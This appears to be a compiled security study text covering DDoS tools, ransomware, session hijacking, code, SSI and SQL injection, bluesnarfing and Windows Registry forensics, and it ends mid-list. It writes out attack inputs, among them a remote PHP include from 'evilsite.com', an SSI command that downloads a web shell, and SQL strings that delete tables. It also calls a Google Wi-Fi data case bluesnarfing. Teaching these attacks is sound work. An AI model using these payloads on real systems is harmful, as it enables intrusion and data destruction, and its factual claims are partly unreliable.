DDoS attacks have increased in magnitude as more and more devices come online through the Internet of Things (IoT).  IoT devices often use default passwords and do not have sound security postures, making them vulnerable to compromise and exploitation. Infection of IoT devices often goes unnoticed by users, and an attacker could easily compromise hundreds of thousands of these devices to conduct a high-scale attack without the device owners’ knowledge.

How do you avoid being part of the problem?
While there is no way to completely avoid becoming a target of a DoS or DDoS attack, there are proactive steps administrators can take to reduce the effects of an attack on their network:
a.       Enroll in a DoS protection service that detects abnormal traffic flows and redirects traffic away from your network. The DoS traffic is filtered out, and clean traffic is passed on to your network.
b.      Create a disaster recovery plan to ensure successful and efficient communication, mitigation, and recovery in the event of an attack.
c.       Strengthen the security posture of all of your internet-connected devices in order to prevent them from being compromised.
d.      Install and maintain antivirus software.
e.      Install a firewall and configure it to restrict traffic coming into and leaving your computer.
f.        Evaluate security settings and follow good security practices in order to minimize the access other people have to your information, as well as to manage unwanted traffic.

How do you know if an attack is happening?
Symptoms of a DoS attack can resemble non-malicious availability issues, such as technical problems with a particular network or a system administrator performing maintenance. However, the following symptoms could indicate a DoS or DDoS attack:
a.       Unusually slow network performance (opening files or accessing websites).
b.      Unavailability of a particular website, or an inability to access any website.
The best way to detect and identify a DoS attack is via network traffic monitoring and analysis. Network traffic can be monitored via a firewall or intrusion detection system. An administrator may even set up rules that create an alert upon the detection of an anomalous traffic load, identify the source of the traffic, or drop network packets that meet certain criteria.
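A rule of that kind might be sketched as follows. The addresses and threshold are hypothetical, and a real IDS would work over sliding time windows rather than a fixed list:

```python
from collections import Counter

# Count requests per source IP over a monitoring window and flag any
# source whose volume exceeds a threshold -- the kind of anomalous-load
# rule an administrator might express in a firewall or IDS.
def flag_sources(requests, threshold):
    counts = Counter(requests)
    return {src for src, n in counts.items() if n > threshold}

# 500 requests from one source against a handful from normal clients.
window = ["10.0.0.5"] * 500 + ["10.0.0.9", "10.0.0.7"] * 3
assert flag_sources(window, threshold=100) == {"10.0.0.5"}
```

Flagged sources can then feed an alert, a rate limit, or a packet-drop rule.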

What do you do if you think you are experiencing an attack?
If you think you or your business is experiencing a DoS or DDoS attack, it is important to contact the appropriate technical professionals for assistance. Contact your network administrator to confirm whether the service outage is due to maintenance or an in-house network issue. Network administrators can also monitor network traffic to confirm the presence of an attack, identify the source, and mitigate the situation by applying firewall rules and possibly rerouting traffic through a DoS protection service.
Contact your ISP to ask if there is an outage on their end or even if their network is the target of the attack and you are an indirect victim. They may be able to advise you on an appropriate course of action. In the case of an attack, do not lose sight of the other hosts, assets, or services residing on your network. Many attackers conduct DoS or DDoS attacks to deflect attention away from their intended target and use the opportunity to conduct secondary attacks on other services within your network.
Although a successful DoS attack can mean bad news, multiple open-source tools are available for detecting your vulnerability to denial-of-service (DoS) attacks. These include:

1.    Hping3
Hping3, a Kali Linux open-source packet crafting tool, allows the type of packet to be set (TCP, UDP, and ICMP), as well as the speed at which to send them. Hping3 enables the user to finely tune the speed of the packets being sent using a microsecond interval. This Active Network Smashing Tool simulates DoS attacks specifically and allows for the creation of HTTP GET and POST requests for web application attacks.
Hping itself is a security tool that is also used for the following:
a.       Firewall testing
b.      Advanced port scanning
c.       Network testing, using different protocols, TOS, and fragmentation
d.      Manual path MTU discovery
e.      Advanced traceroute, under all supported protocols
f.        Remote OS fingerprinting
g.       Remote uptime guessing
h.      TCP/IP stack auditing

2.    HULK
HULK (Http Unbearable Load King) is a web server DDoS attack tool created by security researcher Barry Shteiman to bypass caching and hit the server’s direct resource pool with a high volume of “unique and obfuscated traffic.” HULK is written in Python but has been ported to other languages such as Golang.
HULK was created on the premise that many DDoS tools use an easily observable pattern, thus making detection and mitigation an easier task. HULK creates a unique value for each request being sent. Specific techniques used include the following, as listed on its website:
a.       Source client obfuscation – For every request that is constructed, the User Agent is a random value out of a known list.
b.      Reference forgery – The referrer that points at the request is obfuscated and points into either the host itself or a pre-listed website.
c.       Stickiness – Use a standard Http command to ask the server to maintain open connections by using Keep-Alive with a variable time window.
d.      no-cache – A server that is not behind a dedicated caching service presents a unique page.
e.      Unique URL transformation – Custom parameters are randomized and attached to each request, rendering it unique and causing the server to process the response.
HULK also has a “safe” option to kill the process and control the attack in a lab setting. Some firewalls, including Palo Alto, have specific settings to defend against HULK attacks, making this method a weaker option as time progresses and more vendors adopt these rules.
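The obfuscation techniques listed above can be sketched in Python. This builds randomized requests but deliberately does not send anything, and the agent and referrer lists are illustrative stand-ins for HULK's own "known lists":

```python
import random
import string

# Hypothetical sample values standing in for HULK's known lists.
USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "Mozilla/5.0 (X11; Linux x86_64)",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15)",
]
REFERRERS = ["http://www.google.com/?q=", "http://search.example/?q="]

def build_request(host: str, path: str = "/"):
    """Build (but do not send) one obfuscated request: random User-Agent,
    forged referrer, keep-alive, no-cache, and a unique URL parameter."""
    token = "".join(random.choices(string.ascii_lowercase + string.digits, k=8))
    headers = {
        "User-Agent": random.choice(USER_AGENTS),                   # (a) source obfuscation
        "Referer": random.choice(REFERRERS + [f"http://{host}/"]),  # (b) reference forgery
        "Connection": "Keep-Alive",                                 # (c) stickiness
        "Cache-Control": "no-cache",                                # (d) bypass caching
    }
    url = f"http://{host}{path}?{token}={token[::-1]}"              # (e) unique URL
    return url, headers

u1, h1 = build_request("target.example")
u2, h2 = build_request("target.example")
assert u1 != u2                         # every request is unique
assert h1["Cache-Control"] == "no-cache"
```

Because every URL and header combination differs, simple signature-based filtering of repeated requests fails; defenders instead rate-limit or profile behavior.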

3.    GoldenEye
GoldenEye is an open-source HTTP DDoS attack testing tool based on HULK. This tool sends keep-alive packets to a given host, creating the illusion of a flood of active users connecting—and most importantly staying connected—to a targeted host. GoldenEye should be used for stress testing a given application or web service.

RANSOMWARE
What Is Ransomware?
Ransomware is defined as vicious malware that locks users out of their devices or blocks access to files until a sum of money or ransom is paid. Ransomware attacks cause downtime, data loss, possible intellectual property theft, and in certain industries an attack is considered a data breach.
September 2013 is when ransomware went pro. It typically gets installed on a user’s workstation (PC or Mac) using a social engineering attack where the user gets tricked into clicking on a phishing link or opening an attachment. Once the malware is on the machine, it starts to encrypt all data files it can find on the machine itself and on any network shares the PC has access to.
Next, when a user tries to access one of these files they are blocked, and the system admin, alerted by the user, finds two files in the directory that indicate the files have been taken ransom and explain how to pay the ransom to decrypt them. New strains and variants come and go as new cyber mafias muscle into the "business". The techniques the cybercriminals use are constantly evolving to get past traditional defenses. Some major strains are WannaCry, GandCrab, Phobos and Cerber. This is a very successful criminal business model: annual ransomware-induced costs were projected to exceed $20 billion by 2021, according to a Cybersecurity Ventures report. Once files are encrypted, the only way to get them back is to restore a backup or pay the ransom.
The emergence of new strains has slowed down, but ransomware has gone nuclear and is getting much more sophisticated. In the early days, hackers mostly targeted consumers, and the malware would encrypt immediately upon executing. Later on, ransomware gangs realized they would make a lot more money targeting businesses. At first the malware would spread like a worm through organizations, collecting credentials and encrypting files along the way. Threat actors are now a lot more intelligent in their approach. Once they've gotten in, the malware 'dials home' so that the hacker can do a full analysis of which data is most valuable to their victim, how much they can realistically ask for, and what they can encrypt that will get them a payday sooner.

Timeline of Ransomware
1989

The first ever ransomware virus was created in 1989 by Harvard-trained evolutionary biologist Joseph L. Popp (now known as the 'father of ransomware'). It was called the AIDS Trojan, also known as the PC Cyborg. Popp sent 20,000 infected diskettes labeled “AIDS Information – Introductory Diskettes” to attendees of the World Health Organization’s international AIDS conference in Stockholm. The disks contained malicious code that hid file directories, locked file names and demanded victims send $189 to a PO Box in Panama if they wanted their data back. The AIDS Trojan was “generation one” ransomware and relatively easy to overcome: it used simple symmetric cryptography, and tools were soon available to decrypt the file names. But the AIDS Trojan set the scene for what was to come.

CACHED SESSION HIJACKING
In computer science, session hijacking, sometimes also known as cookie hijacking is the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookie used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer (see HTTP cookie theft). After successfully stealing appropriate session cookies an adversary might use the Pass the Cookie technique to perform session hijacking.
A popular method is using source-routed IP packets. This allows an attacker at point B on the network to participate in a conversation between A and C by encouraging the IP packets to pass through B's machine.
If source-routing is turned off, the attacker can use "blind" hijacking, whereby the attacker guesses the responses of the two machines. Thus, the attacker can send a command, but can never see the response. However, a common command would be to set a password allowing access from elsewhere on the net.
An attacker can also be "inline" between A and C using a sniffing program to watch the conversation. This is known as a "man-in-the-middle attack".

SESSION HIJACKING EXPLOITS
Firesheep
In October 2010, a Mozilla Firefox extension called Firesheep was released that made it easy for session hijackers to attack users of unencrypted public Wi-Fi. Websites like Facebook, Twitter, and any that the user adds to their preferences allow the Firesheep user to easily access private information from cookies and threaten the public Wi-Fi user's personal property. Only months later, Facebook and Twitter responded by offering (and later requiring) HTTP Secure throughout.

WhatsApp sniffer
An app named "WhatsApp Sniffer" was made available on Google Play in May 2012, able to display messages from other WhatsApp users connected to the same network as the app user. At that time WhatsApp used an XMPP infrastructure with plain-text communication, which is what made this sniffing possible.
 
DroidSheep
DroidSheep is a simple Android tool for web session hijacking (sidejacking). It listens for HTTP packets sent via a wireless (802.11) network connection and extracts the session id from these packets in order to reuse them.  DroidSheep can capture sessions using the libpcap library and supports: open (unencrypted) networks, WEP encrypted networks, and WPA/WPA2 encrypted networks (PSK only). This software uses libpcap and arpspoof. The apk was made available on Google Play but it has been taken down by Google.

CookieCadger
CookieCadger is a graphical Java app that automates sidejacking and replay of HTTP requests, to help identify information leakage from applications that use unencrypted GET requests. It is a cross-platform open-source utility based on the Wireshark suite which can monitor wired Ethernet, insecure Wi-Fi, or load a packet capture file for offline analysis. Cookie Cadger has been used to highlight the weaknesses of youth team sharing sites such as Shutterfly (used by AYSO soccer league) and TeamSnap.

Methods to prevent session hijacking include:
a.       Encryption of the data traffic passed between the parties by using SSL/TLS; in particular the session key (though ideally all traffic for the entire session). This technique is widely relied-upon by web-based banks and other e-commerce services, because it completely prevents sniffing-style attacks. However, it could still be possible to perform some other kind of session hijack. In response, scientists from the Radboud University Nijmegen proposed in 2013 a way to prevent session hijacking by correlating the application session with the SSL/TLS credentials.
b.      Use of a long random number or string as the session key. This reduces the risk that an attacker could simply guess a valid session key through trial and error or brute force attacks.
c.       Regenerating the session id after a successful login. This prevents session fixation because the attacker does not know the session id of the user after they have logged in.
d.      Some services make secondary checks against the identity of the user. For instance, a web server could check with each request made that the IP address of the user matched the one last used during that session. This does not prevent attacks by somebody who shares the same IP address, however, and could be frustrating for users whose IP address is liable to change during a browsing session.
e.      Alternatively, some services will change the value of the cookie with each and every request. This dramatically reduces the window in which an attacker can operate and makes it easy to identify whether an attack has taken place, but can cause other technical problems (for example, two legitimate, closely timed requests from the same client can lead to a token check error on the server).
Users may also wish to log out of websites whenever they are finished using them. However this will not protect against attacks such as Firesheep.
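Measures (b) and (c) above can be sketched in Python using the standard secrets module. The dict-backed session store and function names are simplifications for illustration:

```python
import secrets

# In-memory session store: session id -> session data.
sessions = {}

def new_session(data: dict) -> str:
    # (b) long random session key: ~256 bits, infeasible to guess.
    sid = secrets.token_urlsafe(32)
    sessions[sid] = data
    return sid

def login(old_sid: str, user: str) -> str:
    # (c) regenerate the session id on login, so a fixated or stolen
    # pre-login id is useless after authentication.
    data = sessions.pop(old_sid)
    data["user"] = user
    return new_session(data)

anon = new_session({"cart": []})
authed = login(anon, "alice")

assert authed != anon            # fresh id issued at login
assert anon not in sessions      # pre-login id invalidated
assert sessions[authed]["user"] == "alice"
```

Note the use of secrets rather than random: the random module is not cryptographically secure and its output can be predicted.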
 

CODE INJECTION
Code Injection is the general term for attack types which consist of injecting code that is then interpreted/executed by the application. This type of attack exploits poor handling of untrusted data. These types of attacks are usually made possible due to a lack of proper input/output data validation, for example:
a.       allowed characters (standard regular expression classes or custom)
b.      data format
c.       amount of expected data

Code Injection differs from command Injection in that an attacker is only limited by the functionality of the injected language itself. If an attacker is able to inject PHP code into an application and have it executed, he is only limited by what PHP is capable of. Command injection consists of leveraging existing code to execute commands, usually within the context of a shell.

Risk Factors
These types of vulnerabilities can range from very hard to find to easy to find.
If found, they are usually moderately hard to exploit, depending on the scenario.
If successfully exploited, the impact could cover loss of confidentiality, loss of integrity, loss of availability, and/or loss of accountability.

Examples
Example 1
If an application passes a parameter sent via a GET request to the PHP include() function with no input validation, the attacker may try to execute code other than what the developer had in mind.
The URL below passes a page name to the include() function.
http://testsite.com/index.php?page=contact.php
The file “evilcode.php” may contain, for example, the phpinfo() function, which is useful for gaining information about the configuration of the environment in which the web service runs. An attacker can make the application execute his PHP code using the following request:
http://testsite.com/?page=http://evilsite.com/evilcode.php
Example 2
When a developer uses the PHP eval() function and passes it untrusted data that an attacker can modify, code injection could be possible.
The example below shows a dangerous way to use the eval() function:
 
$myvar = "varname";
$x = $_GET['arg'];
eval("\$myvar = \$x;");
 
As there is no input validation, the code above is vulnerable to a Code Injection attack.
For example:
/index.php?arg=1; phpinfo()
While exploiting bugs like these, an attacker may want to execute system commands. In this case, a code injection bug can also be used for command injection, for example:
/index.php?arg=1; system('id')
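The same class of bug exists in any language with an eval facility. The following is a minimal Python analogue of the PHP example above; the function names are ours, for illustration:

```python
import ast

# Vulnerable pattern: untrusted input is executed as code, analogous to
# the PHP eval() example -- anything the language can do, the input can do.
def set_var_unsafe(arg: str):
    env = {}
    exec(f"myvar = {arg}", env)     # DANGEROUS: runs attacker-controlled code
    return env["myvar"]

assert set_var_unsafe("1") == 1
# An attacker can smuggle in an arbitrary expression instead of a value:
assert set_var_unsafe("__import__('os').getpid()") > 0   # code actually ran

# Safer: parse the input as a literal value only; anything that is code
# rather than data raises instead of executing.
def set_var_safe(arg: str):
    return ast.literal_eval(arg)

assert set_var_safe("1") == 1
try:
    set_var_safe("__import__('os').getpid()")
    raise AssertionError("injected code should have been rejected")
except ValueError:
    pass
```

The general lesson matches the PHP case: treat input as data to be parsed, never as code to be evaluated.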

SERVER SIDE INCLUDES
SSIs are directives present in web applications, used to feed an HTML page with dynamic content. They are similar to CGIs, except that SSIs are used to execute some actions before the current page is loaded or while the page is being rendered. To do so, the web server analyzes the SSI directives before supplying the page to the user.
The Server-Side Includes attack allows the exploitation of a web application by injecting scripts into HTML pages or executing arbitrary code remotely. It can be exploited through manipulation of the SSI directives in use in the application, or by forcing their use through user input fields.
It is possible to check if the application is properly validating input fields data by inserting characters that are used in SSI directives, like:
< ! # = / . " - > and [a-zA-Z0-9]
Another way to discover if the application is vulnerable is to verify the presence of pages with the extensions .stm, .shtm and .shtml. However, the lack of these types of pages does not mean that the application is protected against SSI attacks.
In any case, the attack will be successful only if the web server permits SSI execution without proper validation. This can lead to access and manipulation of file system and process under the permission of the web server process owner.
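A crude first-pass check for the directive characters listed above might look like the following sketch. Note that blacklisting characters this way is fragile; real validation should whitelist the expected input format instead:

```python
import re

# Reject input containing any of the special characters used in SSI
# directives (per the character list above) before it is echoed into HTML.
SSI_CHARS = re.compile(r'[<!#=/."\->]')

def is_safe(field: str) -> bool:
    """Return True only if the field contains none of the SSI characters."""
    return SSI_CHARS.search(field) is None

assert is_safe("plain user input")
assert not is_safe('<!--#exec cmd="ls" -->')
# Overly strict by design: legitimate values containing '.', '/', etc.
# are also rejected, which is why whitelisting formats is preferable.
assert not is_safe("user.name@example.com")
```

In practice this kind of filter is combined with output encoding and with disabling SSI execution for any content derived from user input.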
 
The attacker can access sensitive information, such as password files, and execute shell commands. The SSI directives are injected in input fields and are sent to the web server. The web server parses and executes the directives before supplying the page. The attack result will then be viewable the next time the page is loaded in the user’s browser.

Risk Factors
TBD
Examples
Example 1
The commands used to inject SSI vary according to the server operational system in use. The following commands represent the syntax that should be used to execute OS commands.
Linux:
List files of directory:
<!--#exec cmd="ls" -->
Access directories:
<!--#exec cmd="cd /root/dir/" -->
Execution script:
<!--#exec cmd="wget http://mysite.com/shell.txt | rename shell.txt shell.php" -->
Windows:
List files of directory:
<!--#exec cmd="dir" -->
Access directories:
<!--#exec cmd="cd C:\admin\dir" -->
Example 2
Other SSI examples that can be used to access and set server information:
To change the error message output:
<!--#config errmsg="File not found, informs users and password"-->
 
To show current document filename:
<!--#echo var="DOCUMENT_NAME" -->
To show virtual path and filename:
<!--#echo var="DOCUMENT_URI" -->
Using the “config” command and “timefmt” parameter, it is possible to control the date and time output format:
<!--#config timefmt="A %B %d %Y %r"-->
Using the “fsize” command, it is possible to print the size of selected file:
<!--#fsize file="ssi.shtml" -->
Example 3
An old vulnerability in IIS versions 4.0 and 5.0 allows an attacker to obtain system privileges through a buffer overflow in a dynamic link library (ssinc.dll), which is used to process Server-Side Includes (CVE-2001-0506).
By creating a malicious page containing the SSI code below and forcing the application to load it (via a Path Traversal attack), it is possible to perform this attack:
ssi_over.shtml
<!--#include file="UUUUUUUU...UU"-->
PS: The number of “U” characters needs to be greater than 2049.
Forcing application to load the ssi_over.shtml page:
Non-malicious URL:
www.vulnerablesite.org/index.asp?page=news.asp
Malicious URL:
www.vulnerablesite.org/index.asp?page=www.malicioussite.com/ssi_over.shtml
If IIS returns a blank page, it indicates that an overflow has occurred. In this case, the attacker might manipulate the procedure flow and execute arbitrary code.

SQL INJECTION
A SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

Threat Modeling
SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.
SQL Injection is very common with PHP and ASP applications due to the prevalence of older functional interfaces. Due to the nature of programmatic interfaces available, J2EE and ASP.NET applications are less likely to have easily exploited SQL injections.
The severity of SQL Injection attacks is limited by the attacker’s skill and imagination, and to a lesser extent, defense in depth countermeasures, such as low privilege connections to the database server and so on. In general, consider SQL Injection a high impact severity.
SQL injection errors occur when:
a.       Data enters a program from an untrusted source.
b.      The data is used to dynamically construct a SQL query.
The main consequences are:

Confidentiality: Since SQL databases generally hold sensitive data, loss of confidentiality is a frequent problem with SQL Injection vulnerabilities.
Authentication: If poor SQL commands are used to check user names and passwords, it may be possible to connect to a system as another user with no previous knowledge of the password.
Authorization: If authorization information is held in a SQL database, it may be possible to change this information through the successful exploitation of a SQL Injection vulnerability.
Integrity: Just as it may be possible to read sensitive information, it is also possible to make changes or even delete this information with a SQL Injection attack.
SQL Injection has become a common issue with database-driven web sites. The flaw is easily detected, and easily exploited, and as such, any site or software package with even a minimal user base is likely to be subject to an attempted attack of this kind.
 
Essentially, the attack is accomplished by placing a meta character into data input to then place SQL commands in the control plane, which did not exist there before. This flaw depends on the fact that SQL makes no real distinction between the control and data planes.

Examples
Example 1
In SQL:
select id, firstname, lastname from authors
If one provided:
Firstname: evil'ex
Lastname: Newman
The query string becomes:
select id, firstname, lastname from authors where firstname = 'evil'ex' and lastname = 'newman'
which the database cannot parse: the single quote in evil'ex closes the string after evil, so the database rejects the query with a syntax error at the leftover ex' fragment instead of executing it.
 
A safe version of the above SQL statement could be coded in Java as:
String firstname = req.getParameter("firstname");
String lastname = req.getParameter("lastname");
// FIXME: do your own validation to detect attacks
 
String query = "SELECT id, firstname, lastname FROM authors WHERE firstname = ? AND lastname = ?";
PreparedStatement pstmt = connection.prepareStatement( query );
pstmt.setString( 1, firstname );
pstmt.setString( 2, lastname );
try
{
    ResultSet results = pstmt.executeQuery( );
}
catch ( SQLException e )
{
    // handle the error; do not leak database details to the user
}
Example 2
The following C# code dynamically constructs and executes a SQL query that searches for items matching a specified name. The query restricts the items displayed to those where owner matches the user name of the currently-authenticated user.
    ...
    string userName = ctx.getAuthenticatedUserName();
    string query = "SELECT * FROM items WHERE owner = '"
                    + userName + "' AND itemname = '"
                    + ItemName.Text + "'";
    sda = new SqlDataAdapter(query, conn);
    DataTable dt = new DataTable();
    sda.Fill(dt);
    ...
The query that this code intends to execute follows:
    SELECT * FROM items
    WHERE owner = <userName>
    AND itemname = <itemName>;
 
However, because the query is constructed dynamically by concatenating a constant base query string and a user input string, the query only behaves correctly if itemName does not contain a single-quote character. If an attacker with the user name wiley enters the string "name' OR 'a'='a" for itemName, then the query becomes the following:
    SELECT * FROM items
    WHERE owner = 'wiley'
    AND itemname = 'name' OR 'a'='a';
The addition of the OR ‘a’=’a’ condition causes the where clause to always evaluate to true, so the query becomes logically equivalent to the much simpler query:
    SELECT * FROM items;
This simplification of the query allows the attacker to bypass the requirement that the query only return items owned by the authenticated user; the query now returns all entries stored in the items table, regardless of their specified owner.
Example 3
This example examines the effects of a different malicious value passed to the query constructed and executed in Example 2. If an attacker with the user name hacker enters the string "name'); DELETE FROM items; --" for itemName, then the query becomes the following two queries:
    SELECT * FROM items
    WHERE owner = 'hacker'
    AND itemname = 'name';
    DELETE FROM items;
    --'
Many database servers, including Microsoft® SQL Server 2000, allow multiple SQL statements separated by semicolons to be executed at once. While this attack string results in an error in Oracle and other database servers that do not allow the batch-execution of statements separated by semicolons, in databases that do allow batch execution, this type of attack allows the attacker to execute arbitrary commands against the database.
Notice the trailing pair of hyphens (--), which specifies to most database servers that the remainder of the statement is to be treated as a comment and not executed. In this case the comment characters serve to remove the trailing single-quote left over from the modified query. In a database where comments are not allowed to be used in this way, the general attack could still be made effective using a trick similar to the one shown in Example 1. If an attacker enters the string "name'); DELETE FROM items; SELECT * FROM items WHERE 'a'='a", the following three valid statements will be created:
    SELECT * FROM items
    WHERE owner = 'hacker'
    AND itemname = 'name';
    DELETE FROM items;
    SELECT * FROM items WHERE 'a'='a';
One traditional approach to preventing SQL injection attacks is to handle them as an input validation problem and either accept only characters from a whitelist of safe values or identify and escape a blacklist of potentially malicious values. Whitelisting can be a very effective means of enforcing strict input validation rules, but parameterized SQL statements require less maintenance and can offer more guarantees with respect to security. As is almost always the case, blacklisting is riddled with loopholes that make it ineffective at preventing SQL injection attacks. For example, attackers can:
a. Target fields that are not quoted
b. Find ways to bypass the need for certain escaped meta-characters
c. Use stored procedures to hide the injected meta-characters
Manually escaping characters in input to SQL queries can help, but it will not make your application secure from SQL injection attacks.
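The contrast between concatenation and parameterization can be demonstrated end to end. The following sketch, in Python with the standard sqlite3 module and a made-up items table mirroring the examples above, shows the same 'a'='a' input returning every row through a concatenated query and no rows through a parameterized one:

```python
import sqlite3

# Build a throwaway in-memory database with a hypothetical items table.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE items (owner TEXT, itemname TEXT)")
conn.executemany("INSERT INTO items VALUES (?, ?)",
                 [("wiley", "pencil"), ("admin", "secret")])

attack = "name' OR 'a'='a"  # the malicious itemName from the text

# Vulnerable: string concatenation lets the input rewrite the WHERE clause.
query = ("SELECT * FROM items WHERE owner = 'wiley' "
         "AND itemname = '" + attack + "'")
leaked = conn.execute(query).fetchall()
print(len(leaked))   # every row in the table comes back

# Safe: a parameterized query treats the entire input as one literal value.
safe = conn.execute(
    "SELECT * FROM items WHERE owner = ? AND itemname = ?",
    ("wiley", attack)).fetchall()
print(len(safe))     # no row has that literal itemname
```

The parameterized form is the direct analogue of the PreparedStatement shown earlier: the driver transmits the attack string as a single literal value, so it can never terminate the quoted context.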
Another solution commonly proposed for dealing with SQL injection attacks is to use stored procedures. Although stored procedures prevent some types of SQL injection attacks, they fail to protect against many others. For example, the following PL/SQL procedure is vulnerable to the same SQL injection attack shown in the first example.
    procedure get_item (
        itm_cv IN OUT ItmCurTyp,
        usr in varchar2,
        itm in varchar2)
    is
    begin
        open itm_cv for ' SELECT * FROM items WHERE ' ||
                'owner = ''' || usr ||
                ''' AND itemname = ''' || itm || '''';
    end get_item;
Stored procedures typically help prevent SQL injection attacks by limiting the types of statements that can be passed to their parameters. However, there are many ways around the limitations and many interesting statements that can still be passed to stored procedures. Again, stored procedures can prevent some exploits, but they will not make your application secure against SQL injection attacks.
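The vulnerable procedure above can, however, be repaired by supplying the user input through bind variables rather than concatenation. A sketch of the safer form, keeping the hypothetical ItmCurTyp cursor type from the example, using Oracle's OPEN ... FOR ... USING syntax:

```sql
procedure get_item (
    itm_cv IN OUT ItmCurTyp,
    usr in varchar2,
    itm in varchar2)
is
begin
    -- Bind variables (:o, :i) are passed as data, never parsed as SQL,
    -- so a value such as "name' OR 'a'='a" cannot alter the query.
    open itm_cv for
        'SELECT * FROM items WHERE owner = :o AND itemname = :i'
        using usr, itm;
end get_item;
```

As with parameterized statements in application code, the bind values never become part of the SQL text, which is what closes the injection path.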

BLUESNARFING
Bluesnarfing is the theft of information through Bluetooth. Hackers do it by sneaking into mobile devices (smartphones, laptops, tablets, or PDAs) whose connection has been left open by their owners. It involves exploiting Bluetooth vulnerabilities to grab data such as text or email messages, contact lists, and more. It's easy to become a victim of a bluesnarfing attack if you habitually use Bluetooth in public places and your phone is usually in discoverable mode.
Cybercriminals can perform a bluesnarfing attack on a device even when it is up to 300 feet away. What they can steal by doing so is mind-blowing and quite scary: they can practically copy the entire content of your phone or device, including your emails, contact list, phone number, passwords, and pictures. Some bluesnarfing attackers use the victim's phone to call long distance, leaving its owner with a huge telephone bill. All of this happens without the victim's knowledge, of course, so attacks can go on for a long time.
Perhaps the most widely known bluesnarfing case was that performed by Google back in 2013. The tech giant admitted that it collected data from unencrypted wireless networks, which is bluesnarfing in its raw form. Among the information obtained were emails and passwords. As a result, Google paid a settlement amounting to US$7 million.

History of Bluesnarfing
Researcher Marcel Holtmann first discovered bluesnarfing. However, it became publicly known when Adam Laurie of A.L. Digital disclosed a vulnerability on a blog. He found the bug in November 2003 and wanted to let the manufacturers of Bluetooth devices know about it immediately.
At present, both black- and whitehat hackers can easily access bluesnarfing tools and services on the Dark Web. All they initially need is a downloadable penetration-testing utility such as bluediving. This tool identifies if a device is susceptible to bluesnarfing attacks. Once it finds that a device is vulnerable, the hacker can do any of the following:
  1. Perform a bluesnarfing attack on his own if he has enough programming skills.
  2. Hire a bluesnarfing attacker.
  3. Get code snippets from websites that teach bluesnarfing.

How Can You Avoid Bluesnarfing Attacks?
Since the attack relies on Bluetooth connections, the most logical and safest way to counter it is by turning off your device’s Bluetooth when it’s not in use. Below are other best practices to avoid becoming a victim of bluesnarfing:
 
  1. Use a personal identification number (PIN) that has at least eight characters so it will be harder for attackers to crack.
  2. Take advantage of your phone’s security features, such as two-factor authentication (2FA). That way, your approval is needed for all connection requests.
  3. Do not accept pairing requests from unknown devices.
  4. Turn off your phone’s discovery mode to make it invisible to unknown devices.
Any form of theft is scary, and these days, digital theft is alarmingly rampant. Bluesnarfing is just one of the many methods by which attackers can steal your sensitive and confidential data.

WINDOWS REGISTRY
Windows Registry forensics is an important branch of computer and network forensics. Real cases are more complex, and different forensic tools often need to be used together to gather sufficient evidence. The Windows Registry consists of keys and subkeys, many of which have forensic value. In the digital age, information has become a resource that people depend on in every aspect of their lives. With the development of computers and networks, communication has become ever faster, and fast internet access makes it possible to build social networks and share news and events across the world almost instantly. However, as people enjoy the convenience of information access and transfer, the risks to security and privacy grow as well. People with malicious motives use sophisticated technology to access information they are not authorized to see, and it is from the need to investigate such actions that computer and network forensics emerged as a discipline. Computer and network forensics (short for computer and network forensic science) spans a number of fields, such as hard drive forensics, remote forensics, mounted-device forensics, and Registry forensics.

 The Registry structures of Windows XP and Windows 7 are very similar, and both have the same root keys. Microsoft has warned its customers to keep away from the Registry -- Windows's heart -- since it stores all of the computer's settings and is very complex. The Windows Registry contains all of the configuration settings of specific users, groups, hardware, software, and networks. However, hackers often explore and alter the keys and values in the Windows Registry to attack a computer or leave a backdoor.

THE WINDOWS REGISTRY BASICS
Windows Registry is a central repository or hierarchical database of configuration data for the operating system and most of its programs. It contains abundant information that has potential evidential value in forensic analysis. Windows Registry Editor can be used to access Windows Registry. Windows Registry Editor can be started by using the “run” command to run the “regedit.exe” file.
  
 The History of Windows Registry
The root of Microsoft's operating systems was MS-DOS, a command-line operating system. In the DOS age there was no registry, but two files were designed to store configuration information: "config.sys" and "autoexec.bat". "Config.sys" was used to load the device drivers, and "autoexec.bat" was used to store the configurations of running programs and other environment variables. When Microsoft's first graphical-interface operating system, Windows 3.0, was released, these two MS-DOS files were replaced by INI files, which were used to store the configuration settings of the computer.
In Windows 95, a hierarchical database named the Registry was introduced. Although the Registry of Windows 95/98 has a structure similar to that of Windows XP/Vista/7, the amount of data in the Windows XP/Vista/7 Registry has grown tremendously, and its structure is more stable and complex than that of Windows 95/98/2000. The structure of the Windows XP Registry can be considered the basis of the modern Windows Registry: although the Windows Vista/7 Registry holds more content, it has very similar structures, keys, subkeys, and values.

The Structure of Windows Registry
The Windows Registry Editor is divided into two panels, the left one is key panel and the right one is value panel. In the left panel, there are five root keys: HKEY_CLASSES_ROOT, HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE, HKEY_USERS, and HKEY_CURRENT_CONFIG.
These root keys form the basic structure of the Windows Registry. However, this structure is just a logical structure. Among these five root keys, only two, HKEY_LOCAL_MACHINE and HKEY_USERS, have physical files, or hives. These two are called master keys. The other three are derived keys, since they are derived from the two master keys and their subkeys; that is, they only offer symbolic links to the two master keys and their subkeys.
The five root keys and their subkeys are described below:
  1. HKEY_LOCAL_MACHINE (abbr. HKLM). HKLM is the first master key. It contains all of the configuration settings of a computer. When a computer starts up, the local machine settings are loaded before the individual user settings. If we double-click this entry in Windows Registry Editor, five subkeys will be listed: HARDWARE, SAM, SECURITY, SOFTWARE, and SYSTEM.
The information contained in these subkeys is listed below:
